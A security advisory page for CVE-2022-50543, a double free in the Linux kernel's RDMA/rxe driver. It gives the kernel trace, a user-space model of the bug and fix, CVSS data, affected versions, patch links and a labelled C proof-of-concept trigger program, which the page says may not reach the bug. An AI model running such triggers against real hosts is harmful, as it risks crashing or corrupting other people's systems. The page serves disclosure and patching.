Security Vulnerability Report
CVE-2022-50543 CVSS 7.8 HIGH

CVE-2022-50543

Published: 2025-10-07 16:15:39
Last Modified: 2026-02-26 23:17:13
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

RDMA/rxe: Fix mr->map double free

rxe_mr_cleanup() which tries to free mr->map again will be called when
rxe_mr_init_user() fails:

 CPU: 0 PID: 4917 Comm: rdma_flush_serv Kdump: loaded Not tainted 6.1.0-rc1-roce-flush+ #25
 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
 Call Trace:
 <TASK>
 dump_stack_lvl+0x45/0x5d
 panic+0x19e/0x349
 end_report.part.0+0x54/0x7c
 kasan_report.cold+0xa/0xf
 rxe_mr_cleanup+0x9d/0xf0 [rdma_rxe]
 __rxe_cleanup+0x10a/0x1e0 [rdma_rxe]
 rxe_reg_user_mr+0xb7/0xd0 [rdma_rxe]
 ib_uverbs_reg_mr+0x26a/0x480 [ib_uverbs]
 ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x1a2/0x250 [ib_uverbs]
 ib_uverbs_cmd_verbs+0x1397/0x15a0 [ib_uverbs]

This issue was firstly exposed since commit b18c7da63fcb ("RDMA/rxe: Fix
memory leak in error path code") and then we fixed it in commit
8ff5f5d9d8cf ("RDMA/rxe: Prevent double freeing rxe_map_set()") but this
fix was reverted together at last by commit 1e75550648da (Revert
"RDMA/rxe: Create duplicate mapping tables for FMRs")

Simply let rxe_mr_cleanup() always handle freeing the mr->map once it is
successfully allocated.
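
The ownership rule the fix adopts ("let rxe_mr_cleanup() always handle freeing the mr->map once it is successfully allocated") is easier to see in a user-space model than in the trace. The following is an added example written for this page, not the rxe driver's code and not something that touches RDMA: only the function names mirror the driver, while the struct layouts, the NUM_MAP constant, the quarantining tracked_kfree() and the fail_late/fixed switches are stand-ins constructed for this example. It replays the two tear-down orders that rxe_reg_user_mr() can take and counts how many pointers reach the free routine a second time.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_TRACKED 64
#define NUM_MAP 2                 /* size of the map table in every scenario */

/* Simplified stand-ins for the driver's structures (not the real layout). */
struct rxe_map { unsigned long buf[4]; };
struct rxe_mr {
    struct rxe_map **map;         /* table of num_map pointers; NULL until allocated */
    int num_map;
};

/*
 * Quarantining stand-in for kfree(): pointers are recorded, never released,
 * so a second free of the same pointer is counted instead of corrupting this
 * program's own heap the way the real double kfree() corrupts the kernel's.
 */
static const void *freed[MAX_TRACKED];
static int nfreed, ndouble;

static void track_reset(void) { nfreed = ndouble = 0; }
static int free_count(void) { return nfreed; }          /* distinct pointers freed */
static int double_free_count(void) { return ndouble; }  /* repeat frees observed */

static void tracked_kfree(const void *p)
{
    if (!p)
        return;                   /* kfree(NULL) is a no-op */
    for (int i = 0; i < nfreed; i++) {
        if (freed[i] == p) {      /* already freed: this is the double free */
            ndouble++;
            return;
        }
    }
    if (nfreed < MAX_TRACKED)
        freed[nfreed++] = p;
}

static void *xcalloc(size_t n, size_t sz)
{
    void *p = calloc(n, sz);
    if (!p)
        abort();
    return p;
}

/* Allocates mr->map and its entries, as the driver's rxe_mr_alloc() does. */
static void rxe_mr_alloc(struct rxe_mr *mr, int num_map)
{
    mr->map = xcalloc(num_map, sizeof(*mr->map));
    for (int i = 0; i < num_map; i++)
        mr->map[i] = xcalloc(1, sizeof(struct rxe_map));
    mr->num_map = num_map;
}

/*
 * fail_late models an error that happens after the map table exists.
 * Pre-fix (fixed == 0) the error path frees the table itself but leaves
 * mr->map pointing at it; post-fix (fixed == 1) it frees nothing and leaves
 * the table to rxe_mr_cleanup().
 */
static int rxe_mr_init_user(struct rxe_mr *mr, int fail_late, int fixed)
{
    rxe_mr_alloc(mr, NUM_MAP);
    if (!fail_late)
        return 0;
    if (!fixed) {
        for (int i = 0; i < mr->num_map; i++)
            tracked_kfree(mr->map[i]);
        tracked_kfree(mr->map);   /* mr->map is now dangling */
    }
    return -ENOMEM;
}

/* Generic object cleanup: the one place that owns freeing mr->map. */
static void rxe_mr_cleanup(struct rxe_mr *mr)
{
    if (!mr->map)
        return;
    for (int i = 0; i < mr->num_map; i++)
        tracked_kfree(mr->map[i]);
    tracked_kfree(mr->map);
    mr->map = NULL;
}

/*
 * Mirrors rxe_reg_user_mr(): whether init fails (__rxe_cleanup ->
 * rxe_mr_cleanup) or succeeds (later deregistration), rxe_mr_cleanup()
 * runs on the object. Returns the number of double frees observed.
 */
static int reg_user_mr(int fixed, int fail_late)
{
    struct rxe_mr mr = { 0 };

    track_reset();
    (void)rxe_mr_init_user(&mr, fail_late, fixed);
    rxe_mr_cleanup(&mr);
    return double_free_count();
}

int main(void)
{
    int d, f;

    d = reg_user_mr(0, 1); f = free_count();
    printf("pre-fix, init fails late : %d double free(s), %d pointer(s) freed\n", d, f);
    d = reg_user_mr(1, 1); f = free_count();
    printf("fixed,   init fails late : %d double free(s), %d pointer(s) freed\n", d, f);
    d = reg_user_mr(1, 0); f = free_count();
    printf("fixed,   init succeeds   : %d double free(s), %d pointer(s) freed\n", d, f);
    return 0;
}
```

The pre-fix scenario reports every entry of the table plus the table itself freed twice, which is what KASAN flagged inside rxe_mr_cleanup() in the trace above; both fixed scenarios free exactly the same three pointers once. The general lesson is the one the fix applies: when a generic cleanup routine runs on every failure, individual error paths must not also release the resources that routine owns, or they must clear the pointer so the cleanup's NULL check makes the second free a no-op.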

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 5.19.4 up to but not including 6.0.16 (per the NVD record below)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.1 up to but not including 6.1.2 (per the NVD record below)
Linux kernel versions that contain commit b18c7da63fcb ("RDMA/rxe: Fix memory leak in error path code"), which the description names as the commit that first exposed the bug
Linux kernel 6.1.0-rc1 (the build on which the KASAN report in the description was captured)
Any kernel build that includes the RDMA/rxe (Soft-RoCE) module, rdma_rxe, and does not carry the fix commit. Soft-RoCE needs no RDMA hardware; an rxe device is created over an ordinary Ethernet interface with the rdma link add command, so when assessing a host check whether rdma_rxe is loaded (lsmod) as well as comparing uname -r against the ranges above.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2022-50543 - Linux Kernel RDMA/rxe Double Free PoC
 * This PoC attempts to reach the double free by registering a memory
 * region (MR) via RDMA user verbs in a way intended to make
 * rxe_mr_init_user() fail after mr->map allocation.
 *
 * Note: Requires RDMA/rxe module loaded and appropriate permissions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>
#include <infiniband/verbs.h>

int main(int argc, char *argv[])
{
    struct ibv_device **dev_list;
    struct ibv_context *ctx;
    struct ibv_pd *pd;
    struct ibv_mr *mr;

    /* Get list of RDMA devices */
    dev_list = ibv_get_device_list(NULL);
    if (!dev_list || !dev_list[0]) {
        fprintf(stderr, "No RDMA devices found. Ensure rxe (Soft-RoCE) is loaded.\n");
        fprintf(stderr, "Load with: modprobe rdma_rxe\n");
        return 1;
    }

    /* Open the first device (assumed to be the rxe device) */
    ctx = ibv_open_device(dev_list[0]);
    if (!ctx) {
        fprintf(stderr, "Failed to open device: %s\n", strerror(errno));
        ibv_free_device_list(dev_list);
        return 1;
    }

    /* Allocate a Protection Domain */
    pd = ibv_alloc_pd(ctx);
    if (!pd) {
        fprintf(stderr, "Failed to allocate PD: %s\n", strerror(errno));
        ibv_close_device(ctx);
        ibv_free_device_list(dev_list);
        return 1;
    }

    /*
     * Intended trigger: register an MR with invalid parameters so that
     * rxe_mr_init_user() fails, driving rxe_reg_user_mr() into its error
     * path where rxe_mr_cleanup() runs. An unmapped address is used here
     * together with a broad set of access flags.
     */
    void *invalid_addr = (void *)0xDEADBEEF000ULL;
    size_t mr_size = 4096;

    mr = ibv_reg_mr(pd, invalid_addr, mr_size,
                    IBV_ACCESS_LOCAL_WRITE | IBV_ACCESS_REMOTE_WRITE |
                    IBV_ACCESS_REMOTE_READ | IBV_ACCESS_MW_BIND);
    if (mr) {
        printf("MR registered (unexpected). Cleaning up.\n");
        ibv_dereg_mr(mr);
    } else {
        printf("MR registration failed as expected (errno=%d: %s)\n",
               errno, strerror(errno));
        printf("If vulnerable, check dmesg for kernel panic/double-free report.\n");
    }

    /* Cleanup */
    ibv_dealloc_pd(pd);
    ibv_close_device(ctx);
    ibv_free_device_list(dev_list);
    return 0;
}

Build with gcc poc.c -o poc -libverbs; libibverbs headers and an rxe device (rdma link add over an Ethernet interface) are required, and on a host that also has hardware RDMA NICs dev_list[0] may not be the rxe device. Two caveats on what this PoC actually exercises. First, the double free is in rxe_mr_cleanup() running after rxe_mr_init_user() has failed at a point where mr->map already exists, which is what the fix's "once it is successfully allocated" refers to; in rxe_mr_init_user() the user pages are pinned before the map table is allocated, so a registration that fails only because the address is unmapped returns before mr->map exists and does not reach the double free. A reliable trigger needs a failure after that allocation, which this program does not guarantee. Second, the report in the description comes from a KASAN-instrumented kernel (note kasan_report in the trace); on a production kernel without KASAN the second kfree() corrupts the allocator silently, so an empty dmesg after running this does not show that the kernel is patched.

References

Patch commits listed in the NVD record below:
https://git.kernel.org/stable/c/06f73568f553b5be6ba7f6fe274d333ea29fc46d
https://git.kernel.org/stable/c/6ce577f09013206e36e674cd27da3707b2278268
https://git.kernel.org/stable/c/7d984dac8f6bf4ebd3398af82b357e1d181ecaac
Weakness: CWE-415 (Double Free)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50543", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.687", "lastModified": "2026-02-26T23:17:13.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix mr->map double free\n\nrxe_mr_cleanup() which tries to free mr->map again will be called when\nrxe_mr_init_user() fails:\n\n CPU: 0 PID: 4917 Comm: rdma_flush_serv Kdump: loaded Not tainted 6.1.0-rc1-roce-flush+ #25\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n Call Trace:\n <TASK>\n dump_stack_lvl+0x45/0x5d\n panic+0x19e/0x349\n end_report.part.0+0x54/0x7c\n kasan_report.cold+0xa/0xf\n rxe_mr_cleanup+0x9d/0xf0 [rdma_rxe]\n __rxe_cleanup+0x10a/0x1e0 [rdma_rxe]\n rxe_reg_user_mr+0xb7/0xd0 [rdma_rxe]\n ib_uverbs_reg_mr+0x26a/0x480 [ib_uverbs]\n ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x1a2/0x250 [ib_uverbs]\n ib_uverbs_cmd_verbs+0x1397/0x15a0 [ib_uverbs]\n\nThis issue was firstly exposed since commit b18c7da63fcb (\"RDMA/rxe: Fix\nmemory leak in error path code\") and then we fixed it in commit\n8ff5f5d9d8cf (\"RDMA/rxe: Prevent double freeing rxe_map_set()\") but this\nfix was reverted together at last by commit 1e75550648da (Revert\n\"RDMA/rxe: Create duplicate mapping tables for FMRs\")\n\nSimply let rxe_mr_cleanup() always handle freeing the mr->map once it is\nsuccessfully allocated."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, 
"impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19.4", "versionEndExcluding": "6.0.16", "matchCriteriaId": "2237FDD4-5AFF-4893-A8B4-C02F5784133F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/06f73568f553b5be6ba7f6fe274d333ea29fc46d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ce577f09013206e36e674cd27da3707b2278268", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d984dac8f6bf4ebd3398af82b357e1d181ecaac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}